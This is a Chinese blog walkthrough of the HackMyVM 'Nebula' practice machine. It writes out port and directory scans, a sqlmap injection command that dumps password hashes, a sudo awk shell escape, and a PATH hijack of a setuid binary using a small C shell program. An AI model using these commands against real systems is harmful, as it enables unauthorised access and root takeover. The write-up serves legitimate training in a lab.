Nebula - hackmyvm

最新推荐文章于 2024-09-10 17:21:53 发布
最新推荐文章于 2024-09-10 17:21:53 发布
阅读量276 收藏 7
点赞数 4
分类专栏: hackmyvm靶场合集 文章标签: 安全 linux 服务器 网络 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tanbinn/article/details/138310491
版权

简介

靶机名称:Nebula

难度:简单

靶场地址:https://hackmyvm.eu/machines/machine.php?vm=Nebula

本地环境

虚拟机:vitual box

靶场IP(Nebula):192.168.56.111

跳板机IP(windows 10):192.168.56.1 192.168.190.100

渗透机IP(ubuntu 22.04):192.168.190.30

扫描

zenmap随便扫下

nmap -p 1-65535 -T4 -A -v 192.168.56.111/32

image-20240429112407231

22和80端口

http

路径爆破

有一个登录界面

image-20240429112501492

然后路径爆破出一个目录/joinus

feroxbuster -u http://192.168.56.111/ -t 20 -w $HVV_PATH/8_dict/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt  -d 2 -fC 404,403,400

image-20240429122130345

image-20240429122343602

超链接会下载一个文档,里面包含了账密信息

https://nebulalabs.org/meetings?user=admin&password=d46df8e6a5627debf930f7b5c8f3b083

成功登入

image-20240429122528654

sql注入

http://192.168.56.111/login/search_central.php。一眼sql注入。

image-20240429122736218

直接sqlmap一把梭

python3 sqlmap.py -u "http://192.168.56.111/login/search_central.php?id="  --risk 3 --level 5 -dbms=mysql --cookie="PHPSESSID=1lm7qb3vumg4h6t2mnrmpfr88k" -D nebuladb -T centrals --dump-all

Database: nebuladb
Table: central
[2 entries]
+----+----------------------------------+-------------+
| id | password                         | username    |
+----+----------------------------------+-------------+
| 1  | c8c605999f3d8352d7bb792cf3fdb25b | pmccentral  |
| 2  | 6dd0ec0f2c1588fcff2b4cf6b4eca72e | experiment1 |
+----+----------------------------------+-------------+

[12:40:51] [INFO] 表 'nebuladb.central' 已导出到 CSV 文件 '/root/.local/share/sqlmap/output/192.168.56.111/dump/nebuladb/central.csv'
[12:40:51] [INFO] 获取列信息for table 'centrals' in database 'nebuladb'

experoment1没爆出来,pmccentral的密码为999999999

image-20240429124453026

成功登陆ssh

image-20240429124614755

提权

sudo -l

pmccentral@laboratoryuser:~$ sudo -l
[sudo] password for pmccentral:
Sorry, try again.
[sudo] password for pmccentral:
Matching Defaults entries for pmccentral on laboratoryuser:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pmccentral may run the following commands on laboratoryuser:
    (laboratoryadmin) /usr/bin/awk

直接使用awk语法创建一个shell即可:

sudo -u laboratoryadmin /usr/bin/awk 'BEGIN {system("/bin/sh")}'

image-20240429125136378

flag{$udOeR$_Pr!V11E9E_I5_7En53}

逆向

在laboratoryadmin用户目录下有一个autoScripts文件夹,里面有两个二进制文件

laboratoryadmin@laboratoryuser:~/autoScripts$ ls -alh
total 32K
drwxr-xr-x  2 laboratoryadmin laboratoryadmin 4.0K Dec 18 20:16 .
drwx------ 10 laboratoryadmin laboratoryadmin 4.0K Apr 29 05:04 ..
-rwsr-xr-x  1 root            root             17K Dec 17 15:40 PMCEmployees
-rwxrwxr-x  1 laboratoryadmin laboratoryadmin    8 Dec 18 20:16 head

head字面意思,PMCEmployees拿出来逆一下。

image-20240429130725330

首先就是显眼的setuid(0),然后就是执行的当前目录下的head命令。

因为我们对head有写权限,所以直接上传一个提权脚本覆盖掉即可。

#include <stdlib.h>
int main(void) {
  system("/bin/bash");
  return 0;
}

首先把脚本传到靶机上,然后gcc编译成二进制文件,chmod赋予执行权限。最后修改一下环境变量即可。

image-20240429133513422

拿下

image-20240429133728947

古明地核
关注
  • 4
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
微服务治理框架C++实现-grpc-nebula-c-original.zip
01-30
微服务治理框架C++实现-grpc-nebula-c-original
Exploit-Exercises Nebula全攻略——Linux平台下的漏洞分析入门
04-25
Exploit-Exercises Nebula全攻略——Linux平台下的漏洞分析入门
[HackMyVM]靶场 Nebula
qq_34942239的博客
03-22 553
第一种方法,因为我们可以write 这个head,所以可以手改head,注意修改环境变量,把head改成我们修改的head。ssh连接之后发现pmccentral没有user flag,用户目录下有个employees的文件,里面全是人名。成功跳转到laboratoryadmin用户,并且用户目录下有user.txt拿到第一个flag。第二种,就利用原来的head,因为它里面是bash -p也能让我们拿到root权限。经过md5碰撞发现pmccentral的密码是999999999。
i春秋 - Exploit-Exercises: Nebula(1)
大博的博客
04-29 1549
还是老哥的锅,兴冲冲的给我说这个比赛很有意思,一脸懵逼的进来,但是绝对不会一脸懵逼的出去。这个对于我这个才是WEB方面的小白的我来说有点懵逼,最后百度了百度还是懂了一点。那就写下我做这个题的想法。nebula其实就是专门针对linux提权训练的一个靶机,就这个我需要理解很多知识顺便补充了一个find命令(这个find命令补充还是在我的博客里)find / -user flag00 -perm -4...
Exploit-Exercise之Nebula实践(四)
Yale的博客
01-13 483
获取15关卡的flag。 由题目的提示可知,这题需要用到strace,使用strace观察flag15的调用情况。 直接strace跟踪flag15 结果如下: 可以看到(图中受限于屏幕空间没有截全),flag15大量调用libc.so.6 再使用readelf查看 结果如下 可以看到程序对libc.so.6存在依赖,可题目没有提供。我们需要写libc.so.6到哪个路径,让.so...
ExploitExercises_Nebula_Level08
小黑话不多
12-28 468
题目提供了一个capture.pcap文件: 可以看到password部分输入,其中包括几处0x7F,查询ascii表,该值对应删除操作。 还原删除过程,最终得到密码:bacjd00Rmate su - flag08尝试登陆,成功。
nebula-graph安装手稿
云博
03-16 392
1.安装 NebulaGraph下载rpm包--------------------------不建议安装----------------------------安装rpm包。
nebula-graph-studio-3.8.0 ARM架构编译完成的包
12-19
在实际操作中,首先我们需要下载名为“nebula-studio-3.8.0_linux-arm64”的压缩包。这个文件包含了所有必要的二进制文件和脚本,使得部署过程简化到只需一步:解压缩。解压后,进入目录,你会看到“start.sh”脚本...
nebula-V3.3.0镜像资源包
01-23
nebula-V3.3.0镜像资源包,包含meta、storged及graphd对应的镜像,以及nebula-console文件
nebula-graph-studio-v3.1.0
02-18
【标题】"nebula-graph-studio-v3.1.0" 指的是Nebula Graph的一个前端展示工具的特定版本,版本号为3.1.0。Nebula Graph是一个高性能、分布式、大规模图数据库,适用于处理复杂的关联数据查询和分析。此版本的图形...
Nebula K8s 集群中使用 nebula-spark-connector 和 nebula-algorithm
qq_45562973的博客
03-10 329
Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475 本文首发于 Nebula Graph Community 公众号 解决思路 解决 K8s 部署 Nebula Graph 集群后连接不上集群问题最方便的方法是将 nebula-algorithm / nebula-spark 运行在与 nebula-operator 相同
Nebula level11
无心插柳
05-13 5944
About The /home/flag11/flag11 binary processes standard input and executes a shell command. There are two ways of completing this level, you may wish to do both :-) To do this level, log in as the lev
Nebula level02
无心插柳
11-08 6223
There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it? To do this level, log in as the level02 account with the password level02 . Files for t
渗透测试攻防练习实验室 (资源分享,国外在线教程)
热门推荐
关注互联网安全的小虾米一枚
07-26 2万+
Vulnerable Web Applications Vulnerable Web Applications BadStore http://www.badstore.net/ BodgeIt Store http://code.google.com/p/bodgeit/ Butterfly Security Project ht
第146天:内网安全-Web权限维持&各语言内存马&Servlet-api类&Spring类&Agent类
最新发布
weixin_71529930的博客
09-10 716
然后访问http://ip/,这里会卡住,把之前创建的index文件会被删除,后面的页面是我访问的缓存,同时会产生一个.HH.php文件,这个文件是linux的隐藏文件,但是不知为何,我linux搭建的访问不了,只能这样演示。在我去删除的时候,他又会立刻去创建出来,甚至在我鼠标右键的时候因为这个文件不断地创建,右键页面也不能打开,从时间也可以看出来这个文件,在一直的刷新。后面换成了小迪视频里面的冰蝎版本,视频中问题是木马不能再Upload目录下,这里我试了也不行,所以这个还是有很多的bug的。
快速失败 (fail-fast) 和安全失败 (fail-safe)
Flying_Fish_roe的博客
09-07 690
快速失败是一种系统设计原则,当系统遇到异常情况或错误时,立即停止执行并返回错误,而不是试图继续执行或处理潜在的问题。快速失败系统会主动检测系统中的问题,并尽早报告错误,以防止错误进一步传播或导致更大的问题。在快速失败系统中,当检测到某些异常条件或不一致时,系统立即抛出异常或错误,停止当前操作并通知用户或开发者。这种机制通常用于防止错误堆积,使得系统可以快速恢复到正常状态,并尽早解决问题。快速失败的核心思想是“及早报告、及早修复”。通过尽早暴露错误,开发者能够更容易地定位问题,减少问题在系统中的蔓延。
网站安全需求分析与安全保护工程
weixin_49171105的博客
09-09 486
网站:是基于B/S技术架构的综合信息服务平台,主要提供网页信息及业务后台对外接口服务。
【JAVA】Tomcat性能优化、安全配置、资源控制以及运行模式超详细
A的博客
09-09 1469
nio(new I/O),是Java SE 1.4及后续版本提供的一种新的I/O操作方式(即java.nio包及其子包)。Java nio是一个基于缓冲区、并能提供非阻塞I/O操作的Java API,因此nio也被看成是non-blocking I/O的缩写。
给出Python的Nebula-Python库连接NebulaGraph的代码
04-26
好的,以下是连接NebulaGraph的Python代码: ``` from nebula.ConnectionPool import ConnectionPool from nebula.Client import GraphClient import time pool = ConnectionPool(host='127.0.0.1', port=9669) client = GraphClient(pool) try: # 用户名和密码默认均为 root client.authenticate('root', 'nebula') # 执行查询语句 resp = client.execute('SHOW HOSTS') print(resp) finally: pool.close() ```
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值